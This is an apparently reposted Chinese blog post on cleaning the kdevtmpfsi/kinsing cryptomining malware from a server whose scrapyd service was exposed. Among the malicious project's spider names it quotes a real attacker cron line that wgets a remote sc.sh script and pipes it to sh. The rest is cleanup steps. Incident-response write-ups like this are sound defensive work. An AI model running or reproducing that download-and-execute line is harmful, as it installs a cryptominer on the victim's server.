美文网首页
清除挖矿病毒kdevtmpfsi

清除挖矿病毒kdevtmpfsi

作者: 米酒真香 | 来源:发表于2020-08-17 16:13 被阅读0次

首先确保scrapyd没有对外网0.0.0.0开放
可以检查阿里云安全组
还有scrapyd包所在目录的配置文件
一般在虚拟环境目录/lib/python3.x/site-packages/scrapyd
vim default_scrapyd.conf 第11行,bind_address是否为0.0.0.0

curl http://123.45.67.89:6800/listprojects.json
{"node_name": "xxx", "status": "ok", "projects": ["xxx", "evil"]}

evil为不正常的project

curl http://123.45.67.89:6800/listspiders.json?project=evil
结果如下
{
    "node_name": "cetcai",
    "status": "ok",
    "spiders": [
        "防火墙在系统启动时自动禁用",
        "kernel.nmi_watchdog = 0",
        "P NOT EXISTS",
        "52ca5bc47c84a748d2b349871331d36a",
        "kinsing OK",
        "* * * * * wget -q -O - http://195.3.146.118/sc.sh | sh > /dev/null 2>&1",
        "cron good",
        "防火墙在系统启动时自动禁用",
        "kernel.nmi_watchdog = 0",
        "P NOT EXISTS",
        "52ca5bc47c84a748d2b349871331d36a",
        "kinsing OK",
        "* * * * * wget -q -O - http://195.3.146.118/sc.sh | sh > /dev/null 2>&1",
        "cron good"
    ]
}
找到原因

curl http://123.45.67.89:6800/listversions.json?project=evil  # 查看版本
{"node_name": "xxx", "status": "ok", "versions": ["r01"]}
curl http://123.45.67.89:6800/delversion.json -d project=evil -d version=r01  # 删除版本
curl http://123.45.67.89:6800/listversions.json?project=evil  # 再次查看版本
{"node_name": "xxx", "status": "ok", "versions": [""]}  # 已被删除

ps -ef | grep kinsing
ps -ef | grep kdevtmpfsi

查看病毒所在位置和pid
rm 删除
kill -9 杀掉
crontab -e 删除不正常的定时任务

ok

相关文章

网友评论

      本文标题:清除挖矿病毒kdevtmpfsi

      本文链接:https://www.haomeiwen.com/subject/yluqjktx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|清除挖矿病毒kdevtmpfsi|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!